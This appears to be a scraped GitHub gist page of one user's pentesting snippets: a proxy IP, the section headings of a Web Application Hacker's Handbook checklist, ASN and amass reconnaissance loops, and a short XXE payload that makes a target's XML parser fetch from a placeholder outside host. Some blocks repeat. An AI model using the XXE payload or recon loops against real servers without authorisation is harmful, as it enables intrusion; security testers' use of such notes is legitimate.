JeffreyShran JeffreyShran

## bad_proxies
202.93.224.226

## WAHH_Task_Checklist.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                JeffreyShran
                / WAHH_Task_Checklist.md
            
            
              Created
              February 21, 2020 10:38
                — forked from amotmot/WAHH_Task_Checklist.md
            
              
                The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
              
          
    The Web Application Hacker's Handbook

Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
Contents


Recon and analysis
Test handling of access
Test handling of input
Test application logic
Assess application hosting
Miscellaneous tests


## amass_intel_for_loop
for i in $(cat yahoobgp); do echo""; echo "ASN $i";echo ""; amass.netdomains -asn $i;echo ""; done

## bgp.sh
#!/bin/bash

expand $1 |cut -d " " -f1|sed 's/AS//g'
echo ""
echo ""
lined=`expand $1 |cut -d " " -f1|sed 's/AS//g'| tr '\n' ','`

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
	#!/bin/bash

	expand $1 \|cut -d " " -f1\|sed 's/AS//g'
	echo ""
	echo ""
	lined=`expand $1 \|cut -d " " -f1\|sed 's/AS//g'\| tr '\n' ','`
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>